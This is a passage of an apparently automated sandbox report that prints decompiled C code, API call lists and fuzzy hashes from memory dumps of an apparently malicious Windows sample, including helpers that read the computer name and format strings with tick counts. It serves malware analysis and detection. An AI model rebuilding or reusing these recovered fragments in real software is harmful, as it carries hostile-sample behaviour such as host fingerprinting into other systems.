Part of subcall function 02A7A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02A75595), ref: 02A7A72B

lstrcpy.KERNEL32(63699BC4,00000020), ref: 02A763D7
lstrcat.KERNEL32(63699BC4,00000020), ref: 02A763EC
lstrcmp.KERNEL32(00000000,63699BC4), ref: 02A76403
lstrlen.KERNEL32(63699BC4), ref: 02A76427

Strings

, xrefs: 02A76370

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: eccd71a821d9e2c63cb076c270cc748e120f660b1a0f86719861192d02837ac5
Instruction ID: eb38c62c60f717528dbf6a8a6454afbbc1633a60abe6a5b28c469d95db8a8063
Opcode Fuzzy Hash: eccd71a821d9e2c63cb076c270cc748e120f660b1a0f86719861192d02837ac5
Instruction Fuzzy Hash: 7C51B471A00518EBDF11CF59CD847ADBBBAFF45715F1480AAE8259B206CB70D652CB88

Uniqueness

Uniqueness Score: -1.00%

Function 6DEBABF7, Relevance: 6.3, APIs: 4, Instructions: 308COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.501000640.000000006DEBA000.00000080.00020000.sdmp, Offset: 6DEBA000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f9f05cced49a410454feb61cc98ea02fa031f02da62c209ac48c6104900344a
Instruction ID: 572a2d0407a18c47a1758c010eb979684120f7e5d74ced1b91b9afc5916e3402
Opcode Fuzzy Hash: 1f9f05cced49a410454feb61cc98ea02fa031f02da62c209ac48c6104900344a
Instruction Fuzzy Hash: ACA17CB25D93935FCB118A78CE84AA57BA0EF033297380669C5E0DB392EFF46406C751

Uniqueness

Uniqueness Score: -1.00%

Function 02A73AB0, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 02A73B0D
SysAllocString.OLEAUT32(02A785ED), ref: 02A73B51
SysFreeString.OLEAUT32(00000000), ref: 02A73B65
SysFreeString.OLEAUT32(00000000), ref: 02A73B73

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: fa95cf1d1cefb3cba158e6f2291edc74ad68dbfefdfcffb4801caf3b03ea9dd9
Instruction ID: 1773d06da04d9b1bcfc2630c8aff264a61c5f4914f5cc33397770aa28e8e8687
Opcode Fuzzy Hash: fa95cf1d1cefb3cba158e6f2291edc74ad68dbfefdfcffb4801caf3b03ea9dd9
Instruction Fuzzy Hash: 16310F71940209EFCF04EFA9DCD09AEBBB9FF48314B11446EFA059B250DB309945DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 02A76545, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E02A76545(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E02A7A71F(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x02a76551
0x02a76555
0x02a76556
0x02a76557
0x02a76559
0x02a7655b
0x02a7655e
0x02a76563
0x02a765fa
0x02a76601
0x02a76601
0x02a7656c
0x02a76573
0x02a76583
0x02a76583
0x02a76589
0x02a7658b
0x02a76590
0x02a76599
0x02a7659f
0x02a765a4
0x02a765af
0x02a765b3
0x02a765b5
0x02a765b6
0x02a765bf
0x02a765c3
0x02a765d4
0x02a765c5
0x02a765ca
0x02a765cf
0x02a765de
0x02a765de
0x02a765b3
0x02a765e4
0x02a765ea
0x02a765ea
0x02a765f3
0x02a765f8
0x02a765f8
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 02A76573
lstrlenW.KERNEL32(?), ref: 02A765A9
memcpy.NTDLL(00000000,?,?,?), ref: 02A765CA
SysFreeString.OLEAUT32(?), ref: 02A765DE

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: 41b0e891a083f1bbd7a6ee1e8e62a8aa69c6fbd267a1ed3a488d145fb82c9fb1
Instruction ID: fb3113824897265594de8792799477b0c46ef685234378d8e1fa34d71fe7052b
Opcode Fuzzy Hash: 41b0e891a083f1bbd7a6ee1e8e62a8aa69c6fbd267a1ed3a488d145fb82c9fb1
Instruction Fuzzy Hash: 2F213075900609EFCB11DFA8CD84A9EBBB9FF48714F1041A9EA02E7214EF30DA05DB54

Uniqueness

Uniqueness Score: -1.00%

Function 02A7486F, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E02A7486F(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E02A7A71F(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x2a7c284); // executed
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x2a7c284);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}

0x02a7487a
0x02a7487e
0x02a74880
0x02a74881
0x02a74889
0x02a74889
0x02a7488d
0x00000000
0x00000000
0x02a74884
0x02a74885
0x02a74888
0x02a74888
0x02a74895
0x02a7489a
0x02a748a0
0x02a748a8
0x02a748ae
0x02a748b0
0x02a748b5
0x02a748b9
0x02a748bb
0x02a748be
0x02a748c5
0x02a748c5
0x02a748cf
0x02a748d2
0x02a748d3
0x02a748d5
0x02a748e1
0x02a748e1
0x02a748ee

APIs

StrChrA.SHLWAPI(?,00000020,00000000,04D195AC,?,02A75D25,?,02A7243F,04D195AC,?,02A75D25), ref: 02A74889
StrTrimA.KERNELBASE(?,02A7C284,00000002,?,02A75D25,?,02A7243F,04D195AC,?,02A75D25), ref: 02A748A8
StrChrA.SHLWAPI(?,00000020,?,02A75D25,?,02A7243F,04D195AC,?,02A75D25), ref: 02A748B3
StrTrimA.SHLWAPI(00000001,02A7C284,?,02A75D25,?,02A7243F,04D195AC,?,02A75D25), ref: 02A748C5

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 4897834fffe873638943697834c0aab089b50f058b72b70b46c3bb5dc2a133d8
Instruction ID: 8cecedb1032b9684607bc675912d1a0d86f171d04664858aa06dce7305bf58c1
Opcode Fuzzy Hash: 4897834fffe873638943697834c0aab089b50f058b72b70b46c3bb5dc2a133d8
Instruction Fuzzy Hash: 13012D72B457A5AFD2209F658C48F27BBECFF49A64F110519F542D7240DF60C806C5E8

Uniqueness

Uniqueness Score: -1.00%

Function 02A78D14, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02A78D14(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E02A7A2F9(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x2a7d2a8; // 0x229a5a8
				_t4 = _t24 + 0x2a7edc0; // 0x4d19368
				_t5 = _t24 + 0x2a7ed68; // 0x4f0053
				_t26 = E02A75356( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x2a7d2a8; // 0x229a5a8
						_t11 = _t32 + 0x2a7edb4; // 0x4d1935c
						_t48 = _t11;
						_t12 = _t32 + 0x2a7ed68; // 0x4f0053
						_t52 = E02A745C6(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x2a7d2a8; // 0x229a5a8
							_t13 = _t35 + 0x2a7edfe; // 0x30314549
							if(E02A78E27(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x2a7d25c - 6;
								if( *0x2a7d25c <= 6) {
									_t42 =  *0x2a7d2a8; // 0x229a5a8
									_t15 = _t42 + 0x2a7ec0a; // 0x52384549
									E02A78E27(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x2a7d2a8; // 0x229a5a8
							_t17 = _t38 + 0x2a7edf8; // 0x4d193a0
							_t18 = _t38 + 0x2a7edd0; // 0x680043
							_t45 = E02A75D7D(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x2a7d238, 0, _t52);
						}
					}
					HeapFree( *0x2a7d238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E02A74F14(_t54);
				}
				return _t45;
			}

0x02a78d14
0x02a78d24
0x02a78d27
0x02a78d2e
0x02a78d30
0x02a78d30
0x02a78d33
0x02a78d38
0x02a78d3f
0x02a78d4c
0x02a78d51
0x02a78d55
0x02a78d63
0x02a78d71
0x02a78d75
0x02a78e06
0x02a78e06
0x02a78d7b
0x02a78d7b
0x02a78d80
0x02a78d80
0x02a78d87
0x02a78d93
0x02a78d95
0x02a78d97
0x02a78d99
0x02a78da0
0x02a78db2
0x02a78db4
0x02a78dbb
0x02a78dbd
0x02a78dc4
0x02a78dcf
0x02a78dcf
0x02a78dbb
0x02a78dd4
0x02a78dd9
0x02a78de0
0x02a78dfe
0x02a78e00
0x02a78e00
0x02a78d97
0x02a78e12
0x02a78e12
0x02a78e14
0x02a78e19
0x02a78e1b
0x02a78e1b
0x02a78e26

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04D19368,00000000,?,7519F710,00000000,7519F730), ref: 02A78D63
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04D193A0,?,00000000,30314549,00000014,004F0053,04D1935C), ref: 02A78E00
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02A7523E), ref: 02A78E12

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 8dd3d11eb00a8f24b5f1e53672050f5eeee550b090548fd8ebd331c2d1260b0c
Instruction ID: 679ebce575521ada8721fd566c2284008ad8d8c91f8365f73348806dde274e9f
Opcode Fuzzy Hash: 8dd3d11eb00a8f24b5f1e53672050f5eeee550b090548fd8ebd331c2d1260b0c
Instruction Fuzzy Hash: 3C318431D40208BFEB11DB90DD88E9AB7BDEF44704F1505A6A5009B061DF70DE5ADF98

Uniqueness

Uniqueness Score: -1.00%

Function 02A7A376, Relevance: 4.6, APIs: 3, Instructions: 76
memoryCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E02A7A376(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t24;
				void* _t30;
				void* _t36;
				void* _t40;
				intOrPtr _t42;

				_t36 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0x2a7d340; // 0x4d19a60
				_push(0x800);
				_push(0);
				_push( *0x2a7d238);
				if( *0x2a7d24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0x2a7d24c =  *0x2a7d24c + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E02A77306(_t44, _t40); // executed
						_t18 = E02A74A09(_t40, _t44); // executed
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0x2a7d24c < 5) {
								 *0x2a7d24c =  *0x2a7d24c & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E02A76761();
						RtlFreeHeap( *0x2a7d238, 0, _t40); // executed
						goto L10;
					}
					_t24 = E02A71F13(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t24 = E02A74AB6(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25); // executed
				goto L5;
			}

0x02a7a376
0x02a7a376
0x02a7a379
0x02a7a37a
0x02a7a384
0x02a7a38b
0x02a7a390
0x02a7a392
0x02a7a398
0x02a7a3c0
0x02a7a3d8
0x02a7a3da
0x02a7a3db
0x02a7a3dd
0x02a7a41b
0x02a7a41b
0x02a7a421
0x02a7a427
0x02a7a427
0x02a7a3df
0x02a7a3e5
0x02a7a3e8
0x02a7a3f7
0x02a7a3f9
0x02a7a400
0x02a7a434
0x02a7a439
0x02a7a43b
0x02a7a43d
0x02a7a43d
0x00000000
0x02a7a43b
0x02a7a402
0x02a7a407
0x02a7a415
0x00000000
0x02a7a415
0x02a7a3cf
0x02a7a3d4
0x02a7a3d4
0x00000000
0x02a7a3d4
0x02a7a3a2
0x00000000
0x00000000
0x02a7a3b1
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 02A7A39A

Part of subcall function 02A74AB6: GetTickCount.KERNEL32 ref: 02A74ACA
Part of subcall function 02A74AB6: wsprintfA.USER32 ref: 02A74B1A
Part of subcall function 02A74AB6: wsprintfA.USER32 ref: 02A74B37
Part of subcall function 02A74AB6: wsprintfA.USER32 ref: 02A74B63
Part of subcall function 02A74AB6: HeapFree.KERNEL32(00000000,?), ref: 02A74B75
Part of subcall function 02A74AB6: wsprintfA.USER32 ref: 02A74B96
Part of subcall function 02A74AB6: HeapFree.KERNEL32(00000000,?), ref: 02A74BA6
Part of subcall function 02A74AB6: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02A74BD4
Part of subcall function 02A74AB6: GetTickCount.KERNEL32 ref: 02A74BE5

RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 02A7A3B8
RtlFreeHeap.NTDLL(00000000,00000002,02A75289,?,02A75289,00000002,?,?,02A75D5E,?), ref: 02A7A415

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$wsprintf$AllocateFree$CountTick
String ID:
API String ID: 1676223858-0
Opcode ID: d837b980c1654fcbf0a9894bb28c4703ae9f4e9250895a586ebb1559e6881821
Instruction ID: a20f5a49fd74499ef0858798ceba229ac58bbcd337a3d19857af004fdb62ecef
Opcode Fuzzy Hash: d837b980c1654fcbf0a9894bb28c4703ae9f4e9250895a586ebb1559e6881821
Instruction Fuzzy Hash: CC215C75680204FBCB019F98DC84A9E7BBDEF48354F004466F9029B151DF70E956DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEA52E, Relevance: 4.5, APIs: 3, Instructions: 28COMMON

Download Yara Rule

APIs

std::ios_base::_Init.LIBCPMT ref: 6DDEA534

Part of subcall function 6DDEA074: std::ios_base::clear.LIBCPMTD ref: 6DDEA0A3
Part of subcall function 6DDEA074: std::locale::_Init.LIBCPMT ref: 6DDEA0B8

Part of subcall function 6DDEAC30: __EH_prolog3.LIBCMT ref: 6DDEAC37
Part of subcall function 6DDEAC30: std::ios_base::getloc.LIBCPMTD ref: 6DDEAC40

std::ios_base::clear.LIBCPMTD ref: 6DDEA561
std::ios_base::_Addstd.LIBCPMT ref: 6DDEA56D

Memory Dump Source

Source File: 00000003.00000002.500576744.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: Initstd::ios_base::_std::ios_base::clear$AddstdH_prolog3std::ios_base::getlocstd::locale::_
String ID:
API String ID: 3327797918-0
Opcode ID: 75a706e45bd50f0c9afe3102ab609f860f4f84a39c4ba575d6882af7320c9f9c
Instruction ID: 21f35667c4b2f7976ce987783d821a7f6058fbd65e276717303a1a80f1336ef1
Opcode Fuzzy Hash: 75a706e45bd50f0c9afe3102ab609f860f4f84a39c4ba575d6882af7320c9f9c
Instruction Fuzzy Hash: 9FF0A031608355A7DB20AB60D440F5A77E8AF006B8F01A40AF68257A81D775F54087A4

Uniqueness

Uniqueness Score: -1.00%

Function 02A71526, Relevance: 3.8, APIs: 3, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02A71526(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				void* _t35;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x90;
				_v12 = 0x90;
				_t24 = E02A7A71F(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0x2a7d2d8, 0x90);
					_t27 =  *0x2a7d2dc; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						_t51 = _a4;
						E02A71709(0x90, _a4, _t27, 0);
					}
					if(E02A714F3( &_v36) != 0) {
						_t35 = E02A737B8(0x90, _a4,  &_v20,  &_v12,  &_v36, 0); // executed
						if(_t35 == 0) {
							_t55 = _v20;
							_v36 =  *_t46;
							_v16 = E02A74776(_t55, _a8, _t51, _t46, _a12);
							 *(_t55 + 4) = _v36;
							_t20 =  &(_t46[4]); // 0x8b4875c6
							memset(_t55, 0, _v12 - ( *_t20 & 0xf));
							_t57 = _t57 + 0xc;
							E02A7A734(_t55);
						}
					}
					memset(_a4, 0, _t53);
					E02A7A734(_a4);
				}
				return _v16;
			}

0x02a7152c
0x02a71531
0x02a7153e
0x02a71541
0x02a71544
0x02a71549
0x02a7154e
0x02a7155c
0x02a71561
0x02a71566
0x02a7156b
0x02a7156d
0x02a71575
0x02a71575
0x02a71584
0x02a71599
0x02a715a0
0x02a715a7
0x02a715ad
0x02a715bb
0x02a715c1
0x02a715c4
0x02a715d1
0x02a715d6
0x02a715da
0x02a715da
0x02a715a0
0x02a715e5
0x02a715f0
0x02a715f0
0x02a715fc

APIs

Part of subcall function 02A7A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02A75595), ref: 02A7A72B

memcpy.NTDLL(00000000,00000090,00000002,00000002,02A75289,00000008,02A75289,02A75289,?,02A7A3FE,02A75289), ref: 02A7155C
memset.NTDLL ref: 02A715D1
memset.NTDLL ref: 02A715E5

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: memset$AllocateHeapmemcpy
String ID:
API String ID: 1529149438-0
Opcode ID: 86da38a3fb3e4a93f60b497b6878eb5280dc7159137b1f10b7fdea47f6abb0b1
Instruction ID: ef6afe6c7451a5f3802e3d8e85b4b07cd02e340703bd0a18b29e2f2ade2a6c24
Opcode Fuzzy Hash: 86da38a3fb3e4a93f60b497b6878eb5280dc7159137b1f10b7fdea47f6abb0b1
Instruction Fuzzy Hash: 5E211D75A40218BBDB11AB65CD81BDEBBB9AF08750F044055F908E6251EF34DA15CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 02A7219B, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E02A7219B(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E02A73AB0(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x2a7d2a8; // 0x229a5a8
						_t20 = _t68 + 0x2a7e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E02A757B4(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x02a721a1
0x02a721a4
0x02a721b4
0x02a721bd
0x02a721c1
0x02a7228f
0x02a72295
0x02a72295
0x02a721db
0x02a721e0
0x02a721e4
0x02a721ea
0x02a721ef
0x02a721f6
0x02a72205
0x02a72205
0x02a72209
0x02a7220b
0x02a72217
0x02a72222
0x02a7222d
0x02a72231
0x02a7223b
0x02a7223f
0x02a72241
0x02a72246
0x02a7224d
0x02a7225d
0x02a7225d
0x02a72246
0x02a7223f
0x02a7225f
0x02a72264
0x02a72269
0x02a72269
0x02a7226c
0x02a72275
0x02a7227a
0x02a7227a
0x02a7227f
0x02a72284
0x02a72284
0x02a7227f
0x02a72209
0x02a72286
0x02a7228c
0x00000000

APIs

Part of subcall function 02A73AB0: SysAllocString.OLEAUT32(80000002), ref: 02A73B0D
Part of subcall function 02A73AB0: SysFreeString.OLEAUT32(00000000), ref: 02A73B73

SysFreeString.OLEAUT32(?), ref: 02A7227A
SysFreeString.OLEAUT32(02A785ED), ref: 02A72284

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: a974db1b3dc1416cbffbc8dad5669c35a82b125e968c8b400b3abe2b5ad6465f
Instruction ID: 0959861435fb6de543c8c197c658091a9de2c4575f95b168cba73ce0b9057252
Opcode Fuzzy Hash: a974db1b3dc1416cbffbc8dad5669c35a82b125e968c8b400b3abe2b5ad6465f
Instruction Fuzzy Hash: 75313672900119AFCB21EFA4CC88DABBB7AEBD97447104698FC159B210EB31DD51CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 02A758DB, Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E02A758DB(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E02A7A71F(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E02A7A734(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}

0x02a758e0
0x02a758eb
0x02a758ed
0x02a758f3
0x02a758f5
0x02a758fa
0x02a75903
0x02a75907
0x02a75910
0x02a75914
0x02a75923
0x02a75916
0x02a75917
0x02a7591c
0x02a7591c
0x02a75914
0x02a75907
0x02a7592c

APIs

GetComputerNameExA.KERNELBASE(00000003,00000000,02A71FA0,7519F710,00000000,?,?,02A71FA0), ref: 02A758F3

Part of subcall function 02A7A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02A75595), ref: 02A7A72B

GetComputerNameExA.KERNELBASE(00000003,00000000,02A71FA0,02A71FA1,?,?,02A71FA0), ref: 02A75910

Part of subcall function 02A7A734: HeapFree.KERNEL32(00000000,00000000,02A75637,00000000,?,?,00000000), ref: 02A7A740

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
